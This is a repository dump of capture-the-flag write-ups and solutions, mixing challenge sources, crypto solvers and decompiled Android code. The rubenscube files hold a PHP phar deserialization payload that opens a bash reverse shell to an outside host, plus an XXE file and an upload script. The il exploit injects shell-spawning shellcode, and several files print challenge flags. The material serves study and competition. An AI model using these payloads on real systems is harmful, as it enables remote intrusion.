├── 2017
    ├── files
    │   ├── rev150
    │   │   ├── packed
    │   │   ├── packer
    │   │   └── packed_unpacked
    │   ├── rev200
    │   │   ├── rev200.efi
    │   │   └── solve.py
    │   ├── rev250
    │   │   ├── src_deguard.zip
    │   │   ├── messenger_emulator.apk
    │   │   └── SrcCleaned
    │   │   │   └── securemessenger
    │   │   │       ├── xy
    │   │   │           ├── PositionMetric.java.obf
    │   │   │           ├── XYGraphWidget.java.obf
    │   │   │           ├── PositionMetric.java
    │   │   │           ├── XYGraphWidget.java
    │   │   │           ├── a.java.obf
    │   │   │           └── a.java
    │   │   │       ├── Path.java
    │   │   │       ├── Logger.java
    │   │   │       ├── PublicKeyStorage.java
    │   │   │       ├── ECKey.java
    │   │   │       ├── GetMessageReceiver.java
    │   │   │       ├── Main.java
    │   │   │       ├── temp.cs
    │   │   │       ├── Participant.java
    │   │   │       └── EncryptedSession.java
    │   └── rev300
    │   │   └── api_client_apk.apk
    ├── HackIT-rev200.md
    ├── HackIT-rev150.md
    ├── HackIT-rev300.md
    └── HackIT-rev250.md
├── 2018
    ├── csaw 2018 quals
    │   └── 1337
    │   │   ├── call.png
    │   │   ├── flag.png
    │   │   ├── match.png
    │   │   ├── calleax.png
    │   │   ├── memcmp1.png
    │   │   ├── memcmp2.png
    │   │   ├── return.png
    │   │   ├── ebxtrace.png
    │   │   ├── goodflag.png
    │   │   ├── consoleread.png
    │   │   ├── obfuscation.png
    │   │   ├── pseudocodehash.png
    │   │   └── README.md
    └── RealWorldCTF2018_Finals
    │   └── RMI
    │       ├── PoC.PNG
    │       ├── Rejected.PNG
    │       ├── CommonsCollections.PNG
    │       ├── hello-rmi-server.jar
    │       ├── Main.java
    │       └── README.md
├── 2019
    └── midnightsunctf
    │   ├── measurement
    │       ├── aes.png
    │       ├── uart.png
    │       ├── qscat.png
    │       ├── qscat-attack.png
    │       ├── trace-detail.png
    │       └── trace-overview.png
    │   ├── rubenscube
    │       ├── exploit.xml
    │       ├── script.sh
    │       ├── exploit.php
    │       └── rubenscube.md
    │   ├── dr-evil
    │       ├── exploit.py
    │       └── dr-evil.md
    │   ├── marcozuckerbergo
    │       └── marcozuckerbergo.md
    │   ├── cloudb
    │       ├── exploit.py
    │       └── cloudb.md
    │   ├── hfsmbr
    │       └── hfsmbr.md
    │   ├── marcodowno
    │       └── marcodowno.md
    │   ├── hfs-vm
    │       ├── exploit.py
    │       └── hfs-vm.md
    │   ├── tulpan257
    │       └── writeup.md
    │   ├── hfsipc
    │       └── exploit.c
    │   ├── pgp-com
    │       └── pgp-com.md
    │   ├── hfsdos
    │       └── hfsdos.md
    │   ├── ezdsa
    │       └── ezdsa.md
    │   ├── bigspin
    │       └── bigspin.md
    │   └── open-gyckel-krypto
    │       └── open-gyckel-krypto.md
├── 2020
    ├── hxpctf
    │   ├── README.md
    │   └── wisdom2
    │   │   ├── writeup.md
    │   │   └── exploit.c
    └── twctf
    │   ├── xor-shift-enc
    │       ├── .gitignore
    │       ├── gen.py
    │       ├── xor-shift-enc.md
    │       ├── multiply_and_check.sage
    │       └── solve.sage
    │   ├── README.md
    │   ├── nono
    │       ├── nono
    │       ├── layout.ods
    │       ├── layout.png
    │       └── script.py
    │   ├── rsa
    │       ├── rsa
    │       └── rsa.md
    │   ├── il
    │       ├── ilstub-cpy.dll
    │       ├── exploit.py
    │       └── il.md
    │   ├── blind-shot
    │       ├── blindshot
    │       └── script.py
    │   ├── sqrt
    │       ├── chall.py
    │       ├── output.txt
    │       ├── writeup.md
    │       └── solve.sage
    │   ├── twin-d
    │       ├── task.rb
    │       ├── twin-d.md
    │       └── output
    │   ├── the_melancholy_of_alice
    │       ├── publickey.txt
    │       ├── encrypt.py
    │       ├── writeup.md
    │       └── solve.py
    │   ├── easy-hash
    │       └── writeup.md
    │   ├── bfnote
    │       └── writeup.md
    │   ├── mask
    │       ├── mask.py
    │       └── mask.md
    │   ├── does_linux_dream_of_windows
    │       └── writeup.md
    │   ├── urlcheck.md
    │   ├── birds
    │       └── birds.md
    │   ├── apple
    │       ├── solve.py
    │       └── writeup.md
    │   ├── nothing-more-to-say-2020
    │       └── Solution.md
    │   └── angular_of_the_universe
    │       └── writeup.md
├── README.md
└── .gitignore


/README.md:
--------------------------------------------------------------------------------
1 | # ctf


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 | 


--------------------------------------------------------------------------------
/2020/hxpctf/README.md:
--------------------------------------------------------------------------------
1 | # Writeups for hxp CTF 2020
2 | 


--------------------------------------------------------------------------------
/2020/twctf/xor-shift-enc/.gitignore:
--------------------------------------------------------------------------------
1 | *.json
2 | *.sage.py
3 | 


--------------------------------------------------------------------------------
/2020/twctf/README.md:
--------------------------------------------------------------------------------
1 | # Writeups for TokyoWesterns CTF 2020
2 | 
3 | 
4 | 


--------------------------------------------------------------------------------
/2020/twctf/nono/nono:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2020/twctf/nono/nono


--------------------------------------------------------------------------------
/2020/twctf/rsa/rsa:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2020/twctf/rsa/rsa


--------------------------------------------------------------------------------
/2017/files/rev150/packed:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2017/files/rev150/packed


--------------------------------------------------------------------------------
/2017/files/rev150/packer:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2017/files/rev150/packer


--------------------------------------------------------------------------------
/2020/twctf/nono/layout.ods:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2020/twctf/nono/layout.ods


--------------------------------------------------------------------------------
/2020/twctf/nono/layout.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2020/twctf/nono/layout.png


--------------------------------------------------------------------------------
/2017/files/rev200/rev200.efi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2017/files/rev200/rev200.efi


--------------------------------------------------------------------------------
/2020/twctf/il/ilstub-cpy.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2020/twctf/il/ilstub-cpy.dll


--------------------------------------------------------------------------------
/2020/twctf/blind-shot/blindshot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2020/twctf/blind-shot/blindshot


--------------------------------------------------------------------------------
/2017/files/rev150/packed_unpacked:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2017/files/rev150/packed_unpacked


--------------------------------------------------------------------------------
/2017/files/rev250/src_deguard.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2017/files/rev250/src_deguard.zip


--------------------------------------------------------------------------------
/2018/csaw 2018 quals/1337/call.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2018/csaw 2018 quals/1337/call.png


--------------------------------------------------------------------------------
/2018/csaw 2018 quals/1337/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2018/csaw 2018 quals/1337/flag.png


--------------------------------------------------------------------------------
/2018/csaw 2018 quals/1337/match.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2018/csaw 2018 quals/1337/match.png


--------------------------------------------------------------------------------
/2017/files/rev300/api_client_apk.apk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2017/files/rev300/api_client_apk.apk


--------------------------------------------------------------------------------
/2018/csaw 2018 quals/1337/calleax.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2018/csaw 2018 quals/1337/calleax.png


--------------------------------------------------------------------------------
/2018/csaw 2018 quals/1337/memcmp1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2018/csaw 2018 quals/1337/memcmp1.png


--------------------------------------------------------------------------------
/2018/csaw 2018 quals/1337/memcmp2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2018/csaw 2018 quals/1337/memcmp2.png


--------------------------------------------------------------------------------
/2018/csaw 2018 quals/1337/return.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2018/csaw 2018 quals/1337/return.png


--------------------------------------------------------------------------------
/2017/files/rev250/messenger_emulator.apk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2017/files/rev250/messenger_emulator.apk


--------------------------------------------------------------------------------
/2018/RealWorldCTF2018_Finals/RMI/PoC.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2018/RealWorldCTF2018_Finals/RMI/PoC.PNG


--------------------------------------------------------------------------------
/2018/csaw 2018 quals/1337/ebxtrace.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2018/csaw 2018 quals/1337/ebxtrace.png


--------------------------------------------------------------------------------
/2018/csaw 2018 quals/1337/goodflag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2018/csaw 2018 quals/1337/goodflag.png


--------------------------------------------------------------------------------
/2019/midnightsunctf/measurement/aes.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2019/midnightsunctf/measurement/aes.png


--------------------------------------------------------------------------------
/2019/midnightsunctf/measurement/uart.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2019/midnightsunctf/measurement/uart.png


--------------------------------------------------------------------------------
/2018/csaw 2018 quals/1337/consoleread.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2018/csaw 2018 quals/1337/consoleread.png


--------------------------------------------------------------------------------
/2018/csaw 2018 quals/1337/obfuscation.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2018/csaw 2018 quals/1337/obfuscation.png


--------------------------------------------------------------------------------
/2019/midnightsunctf/measurement/qscat.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2019/midnightsunctf/measurement/qscat.png


--------------------------------------------------------------------------------
/2018/RealWorldCTF2018_Finals/RMI/Rejected.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2018/RealWorldCTF2018_Finals/RMI/Rejected.PNG


--------------------------------------------------------------------------------
/2018/csaw 2018 quals/1337/pseudocodehash.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2018/csaw 2018 quals/1337/pseudocodehash.png


--------------------------------------------------------------------------------
/2019/midnightsunctf/measurement/qscat-attack.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2019/midnightsunctf/measurement/qscat-attack.png


--------------------------------------------------------------------------------
/2019/midnightsunctf/measurement/trace-detail.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2019/midnightsunctf/measurement/trace-detail.png


--------------------------------------------------------------------------------
/2019/midnightsunctf/measurement/trace-overview.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2019/midnightsunctf/measurement/trace-overview.png


--------------------------------------------------------------------------------
/2018/RealWorldCTF2018_Finals/RMI/CommonsCollections.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2018/RealWorldCTF2018_Finals/RMI/CommonsCollections.PNG


--------------------------------------------------------------------------------
/2018/RealWorldCTF2018_Finals/RMI/hello-rmi-server.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/allesctf/writeups/HEAD/2018/RealWorldCTF2018_Finals/RMI/hello-rmi-server.jar


--------------------------------------------------------------------------------
/2017/files/rev250/SrcCleaned/securemessenger/xy/PositionMetric.java.obf:
--------------------------------------------------------------------------------
 1 | package messenger.hackit2017.com.securemessenger.a;
 2 | 
 3 | public class c
 4 |   extends a
 5 | {
 6 |   public c() {}
 7 |   
 8 |   protected int a()
 9 |   {
10 |     return 1;
11 |   }
12 | }
13 | 


--------------------------------------------------------------------------------
/2017/files/rev250/SrcCleaned/securemessenger/xy/XYGraphWidget.java.obf:
--------------------------------------------------------------------------------
 1 | package messenger.hackit2017.com.securemessenger.a;
 2 | 
 3 | public class b
 4 |   extends a
 5 | {
 6 |   public b() {}
 7 |   
 8 |   protected int a()
 9 |   {
10 |     return 0;
11 |   }
12 | }
13 | 


--------------------------------------------------------------------------------
/2019/midnightsunctf/rubenscube/exploit.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="ISO-8859-1"?>
2 | <!DOCTYPE foo [ <!ELEMENT foo ANY >
3 | <!ENTITY xxe SYSTEM "phar://PAYLOAD/test.txt" >]>
4 | <svg width="100" height="100">
5 |     <user>&xxe;</user>
6 |     <pass>mypass</pass>
7 | </svg>
8 | 


--------------------------------------------------------------------------------
/2017/files/rev250/SrcCleaned/securemessenger/xy/PositionMetric.java:
--------------------------------------------------------------------------------
 1 | package messenger.hackit2017.helper.securemessenger.xy;
 2 | 
 3 | public class PositionMetric
 4 |   extends a
 5 | {
 6 |   public PositionMetric() {}
 7 |   
 8 |   protected int b()
 9 |   {
10 |     return 1;
11 |   }
12 | }
13 | 


--------------------------------------------------------------------------------
/2017/files/rev250/SrcCleaned/securemessenger/xy/XYGraphWidget.java:
--------------------------------------------------------------------------------
 1 | package messenger.hackit2017.helper.securemessenger.xy;
 2 | 
 3 | public class XYGraphWidget
 4 |   extends a
 5 | {
 6 |   public XYGraphWidget() {}
 7 |   
 8 |   protected int b()
 9 |   {
10 |     return 0;
11 |   }
12 | }
13 | 


--------------------------------------------------------------------------------
/2017/files/rev250/SrcCleaned/securemessenger/Path.java:
--------------------------------------------------------------------------------
 1 | package messenger.hackit2017.helper.securemessenger;
 2 | 
 3 | public class StringStorage
 4 | {
 5 |   private String id;
 6 |   
 7 |   public StringStorage(String paramString)
 8 |   {
 9 |     id = paramString;
10 |   }
11 |   
12 |   public String getStoredValue()
13 |   {
14 |     return id;
15 |   }
16 |   
17 |   public String toString()
18 |   {
19 |     return id;
20 |   }
21 | }
22 | 


--------------------------------------------------------------------------------
/2019/midnightsunctf/rubenscube/script.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 | php exploit.php
3 | id=$(uuidgen)
4 | curl -X POST http://ruben-01.play.midnightsunctf.se:8080/upload.php --form "image=@exploit.tar" -b "PHPSESSID=$id"
5 | img=$(curl http://ruben-01.play.midnightsunctf.se:8080/index.php -b "PHPSESSID=$id" | grep -o "images/[^'_]*.jpg")
6 | sed -e "s@PAYLOAD@$img@" exploit.xml | curl -X POST http://ruben-01.play.midnightsunctf.se:8080/upload.php --form "image=@-" -b "PHPSESSID=$id"
7 | 


--------------------------------------------------------------------------------
/2020/twctf/sqrt/chall.py:
--------------------------------------------------------------------------------
 1 | from Crypto.Util.number import bytes_to_long, isPrime
 2 | from secret import flag, p
 3 | 
 4 | 
 5 | def encrypt(m, k, p):
 6 |     return pow(m, 1 << k, p)
 7 | 
 8 | 
 9 | assert flag.startswith("TWCTF{")
10 | assert len(flag) == 42
11 | assert isPrime(p)
12 | 
13 | k = 64
14 | pt = bytes_to_long(flag.encode())
15 | ct = encrypt(pt, k, p)
16 | 
17 | with open("output.txt", "w") as f:
18 |     f.write(str(ct) + "\n")
19 |     f.write(str(p) + "\n")
20 | 


--------------------------------------------------------------------------------
/2019/midnightsunctf/dr-evil/exploit.py:
--------------------------------------------------------------------------------
 1 | from scapy.all import *
 2 | import binascii
 3 | 
 4 | pcap = rdpcap('dr-evil.pcap')
 5 | res = []
 6 | 
 7 | for packet in pcap:
 8 |     if IP in packet and packet[IP].src == '52.15.194.28':
 9 |         res.append(packet[IP].flags == 'evil')
10 | 
11 | # print boolean array as ascii (extra 0 because the string did not have even length)
12 | print(binascii.unhexlify('%x0' % int(''.join(map(lambda b: '1' if b else '0', res)), 2)).decode())
13 | 


--------------------------------------------------------------------------------
/2017/files/rev200/solve.py:
--------------------------------------------------------------------------------
 1 | # Solution for rev200
 2 | 
 3 | correct = [104, 60, 121, 113, 99, 124, 129, 146, 146, 101, 101, 147, 146, 73, 121, 146, 56, 108, 60, 111, 123, 135, 88, 85, 137, 90, 89, 126, 126, 107, 135, 108, 87, 108, 107, 88, 89, 90, 90, 111];
 4 | 
 5 | correctS = "";
 6 | 
 7 | for x in range(20):
 8 | 	for i in range(256):
 9 | 		if ((((((i ^ 0xC) + 6) ^ 0xD) + 7) ^ 0xE) + 8) == correct[x]:
10 | 			correctS += chr(i)
11 | 
12 | for x in range(20):
13 | 	for i in range(256):
14 | 		if (((((i ^ 0xF) + 9) ^ 0x10) + 10) ^ 0x11) + 11 == correct[x+20]:
15 | 			correctS += chr(i)
16 |    
17 | print correctS


--------------------------------------------------------------------------------
/2020/twctf/sqrt/output.txt:
--------------------------------------------------------------------------------
1 | 5602276430032875007249509644314357293319755912603737631044802989314683039473469151600643674831915676677562504743413434940280819915470852112137937963496770923674944514657123370759858913638782767380945111493317828235741160391407042689991007589804877919105123960837253705596164618906554015382923343311865102111160
2 | 6722156186149423473586056936189163112345526308304739592548269432948561498704906497631759731744824085311511299618196491816929603296108414569727189748975204102209646335725406551943711581704258725226874414399572244863268492324353927787818836752142254189928999592648333789131233670456465647924867060170327150559233
3 | 


--------------------------------------------------------------------------------
/2017/files/rev250/SrcCleaned/securemessenger/Logger.java:
--------------------------------------------------------------------------------
 1 | package messenger.hackit2017.helper.securemessenger;
 2 | 
 3 | import android.util.Log;
 4 | import java.io.PrintStream;
 5 | import org.apache.commons.math3.fraction.Participant;
 6 | 
 7 | public class Logger
 8 | {
 9 |   public static void add(String paramString)
10 |   {
11 |     write(paramString);
12 |   }
13 |   
14 |   public static void add(String paramString, byte[] paramArrayOfByte)
15 |   {
16 |     write(paramString + new String(Participant.add(paramArrayOfByte)));
17 |   }
18 |   
19 |   private static void write(String paramString)
20 |   {
21 |     System.out.println(paramString);
22 |     Log.i("Messenger", paramString);
23 |   }
24 | }
25 | 


--------------------------------------------------------------------------------
/2020/twctf/il/exploit.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | from base64 import b64encode
 3 | 
 4 | context.arch = 'amd64'
 5 | 
 6 | with open('ilstub-cpy.dll', 'rb') as f:
 7 |     func = f.read()[612: 612 + 0x2B]
 8 | 
 9 | offset = 32
10 | 
11 | preamble = func[0: 0x1E].replace(b'\x41' * 8, p64(offset))
12 | write_primitive = func[0x1E:]
13 | 
14 | shellcode = group(8, asm(shellcraft.amd64.linux.sh()))
15 | 
16 | exploit = preamble[:]
17 | for block in shellcode:
18 |     exploit += write_primitive.replace(b'\x42' * 8, bytes(block).ljust(8, b'\x90'))
19 | 
20 | if args.REMOTE:
21 |     p = remote('pwn02.chal.ctf.westerns.tokyo', 23541)
22 | else:
23 |     p = process('./il')
24 | p.sendlineafter(b'spell:\n', b64encode(exploit))
25 | p.interactive()
26 | 


--------------------------------------------------------------------------------
/2017/files/rev250/SrcCleaned/securemessenger/PublicKeyStorage.java:
--------------------------------------------------------------------------------
 1 | package messenger.hackit2017.helper.securemessenger;
 2 | 
 3 | import java.security.SecureRandom;
 4 | import org.apache.commons.math3.fraction.Participant;
 5 | 
 6 | public class PublicKeyStorage
 7 | {
 8 |   private long seed = new SecureRandom().nextInt(Integer.MAX_VALUE);
 9 |   private byte[] seedBytesQ;
10 |   
11 |   public PublicKeyStorage(byte[] paramArrayOfByte)
12 |   {
13 |     seedBytesQ = paramArrayOfByte;
14 |   }
15 |   
16 |   public byte[] getSeedBytesQ()
17 |   {
18 |     return seedBytesQ;
19 |   }
20 |   
21 |   public long getSeed()
22 |   {
23 |     return seed;
24 |   }
25 |   
26 |   public String toString()
27 |   {
28 |     return "[" + a + " : " + new String(Participant.add(b)) + "]";
29 |   }
30 | }
31 | 


--------------------------------------------------------------------------------
/2020/twctf/twin-d/task.rb:
--------------------------------------------------------------------------------
 1 | require 'json'
 2 | require 'openssl'
 3 | 
 4 | p = OpenSSL::BN::generate_prime(1024).to_i
 5 | q = OpenSSL::BN::generate_prime(1024).to_i
 6 | 
 7 | while true
 8 |     d = OpenSSL::BN::generate_prime(1024).to_i
 9 |     break if ((p - 1) * (q - 1)).gcd(d) == 1 && ((p - 1) * (q - 1)).gcd(d + 2) == 1
10 | end
11 | 
12 | puts d
13 | puts q
14 | puts p
15 | e1 = OpenSSL::BN.new(d).mod_inverse(OpenSSL::BN.new((p - 1) * (q - 1))).to_i
16 | e2 = OpenSSL::BN.new(d + 2).mod_inverse(OpenSSL::BN.new((p - 1) * (q - 1))).to_i
17 | 
18 | flag = File.read('flag.txt')
19 | msg = OpenSSL::BN.new(flag.unpack1("H*").to_i(16))
20 | n = OpenSSL::BN.new(p * q)
21 | enc = msg.mod_exp(OpenSSL::BN.new(e1), n)
22 | 
23 | puts ({ n: (p*q).to_s, e1: e1.to_s, e2: e2.to_s, enc: enc.to_s }).to_json
24 | 


--------------------------------------------------------------------------------
/2019/midnightsunctf/rubenscube/exploit.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | include("./phpggc/lib/PHPGGC.php");
 4 | 
 5 | class Image {
 6 | };
 7 | $object = new Image;
 8 | $object->folder="`bash -c 'bash -i >& /dev/tcp/cherryworm.net/1337 0>&1' >images/h 2>&1`";
 9 | $object->file_name="idc";
10 | $object->extension="idc";
11 | $object->tmp_name="idc";
12 | 
13 | $serialized = serialize($object);
14 | $jpeg="./empty.jpg";
15 | $phar = new \PHPGGC\Phar\Tar($serialized, compact("jpeg"));
16 | file_put_contents('exploit.tar', $phar->generate());
17 | 
18 | // // $phar = new \PHPGGC\Phar\Phar($serialized, ["prefix"=>"XXXXXXX"]);
19 | // // file_put_contents('exploit.phar', $phar->generate());
20 | 
21 | // $phar = new \PHPGGC\Phar\Zip($serialized);
22 | // file_put_contents('exploit.zip', $phar->generate());
23 | ?>
24 | 


--------------------------------------------------------------------------------
/2020/twctf/the_melancholy_of_alice/publickey.txt:
--------------------------------------------------------------------------------
1 | p = 168144747387516592781620466787069575171940752179672411574452734808497653671359884981272746489813635225263167370526619987842319278446075098036112998679570069486935297242638675590736039429506131690941660748942375274820626186241210376537247501823653926524570571499198040207829317830442983944747691656715907048411
2 | q = 84072373693758296390810233393534787585970376089836205787226367404248826835679942490636373244906817612631583685263309993921159639223037549018056499339785034743467648621319337795368019714753065845470830374471187637410313093120605188268623750911826963262285285749599020103914658915221491972373845828357953524205
3 | g = 2
4 | h = 98640592922797107093071054876006959817165651265269454302952482363998333376245900760045606011965672215605936345612030149799453733708430421685495677502147392514542499678987737269487279698863617849581626352877756515435930907093553607392143564985566046429416461073375036461770604488387110385404233515192951025299
5 | 


--------------------------------------------------------------------------------
/2017/files/rev250/SrcCleaned/securemessenger/ECKey.java:
--------------------------------------------------------------------------------
 1 | package messenger.hackit2017.helper.securemessenger;
 2 | 
 3 | import org.apache.commons.math3.fraction.Participant;
 4 | 
 5 | public class ECKey
 6 | {
 7 |   private long currentCounter;
 8 |   private byte[] priv;
 9 |   private byte[] pub;
10 |   private long seed;
11 |   
12 |   public ECKey(byte[] paramArrayOfByte1, long paramLong1, long paramLong2, byte[] paramArrayOfByte2)
13 |   {
14 |     pub = paramArrayOfByte1;
15 |     currentCounter = paramLong1;
16 |     seed = paramLong2;
17 |     priv = paramArrayOfByte2;
18 |   }
19 |   
20 |   public long getSeed()
21 |   {
22 |     return seed;
23 |   }
24 |   
25 |   public long getCreationTimeSeconds()
26 |   {
27 |     return currentCounter;
28 |   }
29 |   
30 |   public byte[] getPrivKeyBytes()
31 |   {
32 |     return priv;
33 |   }
34 |   
35 |   public byte[] getPubKey()
36 |   {
37 |     return pub;
38 |   }
39 |   
40 |   public String toString()
41 |   {
42 |     return new String(Participant.add(pub)) + " -> [" + currentCounter + "]";
43 |   }
44 | }
45 | 


--------------------------------------------------------------------------------
/2020/twctf/the_melancholy_of_alice/encrypt.py:
--------------------------------------------------------------------------------
 1 | from Crypto.Util.number import getStrongPrime, getRandomRange
 2 | 
 3 | N = 1024
 4 | 
 5 | 
 6 | def generateKey():
 7 |     p = getStrongPrime(N)
 8 |     q = (p - 1) // 2
 9 |     x = getRandomRange(2, q)
10 |     g = 2
11 |     h = pow(g, x, p)
12 |     pk = (p, q, g, h)
13 |     sk = x
14 |     return (pk, sk)
15 | 
16 | 
17 | def encrypt(m, pk):
18 |     (p, q, g, h) = pk
19 |     r = getRandomRange(2, q)
20 |     c1 = pow(g, r, p)
21 |     c2 = m * pow(h, r, p) % p
22 |     return (c1, c2)
23 | 
24 | 
25 | def main():
26 |     with open("flag.txt") as f:
27 |         flag = f.read().strip()
28 | 
29 |     pk, sk = generateKey()
30 |     with open("publickey.txt", "w") as f:
31 |         f.write(f"p = {pk[0]}\n")
32 |         f.write(f"q = {pk[1]}\n")
33 |         f.write(f"g = {pk[2]}\n")
34 |         f.write(f"h = {pk[3]}\n")
35 | 
36 |     with open("ciphertext.txt", "w") as f:
37 |         for m in flag:
38 |             c = encrypt(ord(m), pk)
39 |             f.write(f"{c}\n")
40 | 
41 | 
42 | if __name__ == "__main__":
43 |     main()
44 | 


--------------------------------------------------------------------------------
/2017/files/rev250/SrcCleaned/securemessenger/GetMessageReceiver.java:
--------------------------------------------------------------------------------
 1 | package messenger.hackit2017.helper.securemessenger;
 2 | 
 3 | import android.content.BroadcastReceiver;
 4 | import android.content.Context;
 5 | import android.content.Intent;
 6 | import android.os.Bundle;
 7 | 
 8 | public class GetMessageReceiver
 9 |   extends BroadcastReceiver
10 | {
11 |   public GetMessageReceiver() {}
12 |   
13 |   public void onReceive(Context paramContext, Intent paramIntent)
14 |   {
15 |     Object localObject = paramIntent.getExtras().get("encrypted");
16 |     if (!(localObject instanceof ECKey)) {
17 |       throw new ClassCastException("Garbage got.");
18 |     }
19 |     paramIntent = paramIntent.getExtras().get("participant");
20 |     if (!(localObject instanceof Participant)) {
21 |       throw new ClassCastException("Garbage got.");
22 |     }
23 |     try
24 |     {
25 |       paramContext = Main.getParticipant();
26 |       localObject = (ECKey)localObject;
27 |       paramIntent = (Participant)paramIntent;
28 |       paramContext.a((ECKey)localObject, paramIntent);
29 |       return;
30 |     }
31 |     catch (Exception paramContext)
32 |     {
33 |       paramContext.printStackTrace();
34 |     }
35 |   }
36 | }
37 | 


--------------------------------------------------------------------------------
/2020/twctf/easy-hash/writeup.md:
--------------------------------------------------------------------------------
 1 | # easy-hash
 2 | 
 3 | The authors delivered source-code of a hashing function. The following constraints needed to be fulfilled in order to pass the first checks:
 4 | 
 5 | - Text begins with 'twctf: '
 6 | - Text ends with '2020'
 7 | - Text must be different to original MSG = 'twctf: please give me the flag of 2020'
 8 | 
 9 | In order to get the flag, the hash of the passed message needs to match the hash of the previous mentioned MSG.
10 | 
11 | The used hash function was:
12 | 
13 | ```python
14 | [...]
15 | def easy_hash(x):
16 |     m = 0
17 |     for i in range(len(x) - 3):
18 |         m += struct.unpack('<I', x[i:i + 4])[0]
19 |         m = m & 0xffffffff
20 |     return m
21 | [...]
22 | ```
23 | 
24 | ## Solution
25 | After locally fiddling around with the function in python, it looked like pretty linear hashing. Thus by decreasing one char (p->o) and increasing another one (l->m) of the word "please" I was able to get the same hash. 
26 | 
27 | ```python
28 | MSG = b'twctf: please give me the flag of 2020'
29 | MSG1 = b'twctf: omease give me the flag of 2020'
30 | easy_hash(MSG) # =1788732187
31 | easy_hash(MSG1) # =1788732187
32 | ```
33 | 
34 | The final curl to the remote server looked like this:
35 | 
36 | ```bash=
37 | curl https://crypto01.chal.ctf.westerns.tokyo -d 'twctf: omease give me the flag of 2020'
38 | ```
39 | 
40 | ## Flag
41 | TWCTF{colorfully_decorated_dream}


--------------------------------------------------------------------------------
/2017/files/rev250/SrcCleaned/securemessenger/Main.java:
--------------------------------------------------------------------------------
 1 | package messenger.hackit2017.helper.securemessenger;
 2 | 
 3 | import android.os.Bundle;
 4 | import android.support.v7.app.AppCompatActivity;
 5 | import android.view.View;
 6 | import android.widget.Button;
 7 | import android.widget.EditText;
 8 | import java.util.HashMap;
 9 | import messenger.hackit2017.com.securemessenger.d;
10 | 
11 | public class Main
12 |   extends AppCompatActivity
13 | {
14 |   private static final Participant i = new Participant("alice");
15 |   private HashMap<String, d> map = new HashMap();
16 |   
17 |   public Main() {}
18 |   
19 |   public static Participant getParticipant()
20 |   {
21 |     return i;
22 |   }
23 |   
24 |   protected void onCreate(Bundle paramBundle)
25 |   {
26 |     super.onCreate(paramBundle);
27 |     setContentView(2130968603);
28 |     paramBundle = (Button)findViewById(2131427426);
29 |     EditText localEditText = (EditText)findViewById(2131427423);
30 |     paramBundle.setOnClickListener(new Main.1(this, (EditText)findViewById(2131427425), localEditText));
31 | 
32 |       if (!inHashmap)
33 |         add new Particpant ("bob", etc...)
34 | 
35 |         try
36 |         {
37 |           AliceParticipant.createPencryptDataartipantQ(new StringStorage(localEditText.getText().toString()), existingParticipant);
38 |           return;
39 |         }
40 |         catch (Exception paramAnonymousView)
41 |         {
42 |           paramAnonymousView.printStackTrace();
43 |         }
44 | 
45 |   }
46 | }
47 | 


--------------------------------------------------------------------------------
/2020/twctf/bfnote/writeup.md:
--------------------------------------------------------------------------------
 1 | # bfnote
 2 | Category: Web
 3 | 
 4 | Solves: 18, Score: 320  
 5 | 
 6 | > Share your best Brainf*ck code at [bfnote](https://bfnote.chal.ctf.westerns.tokyo/)
 7 | 
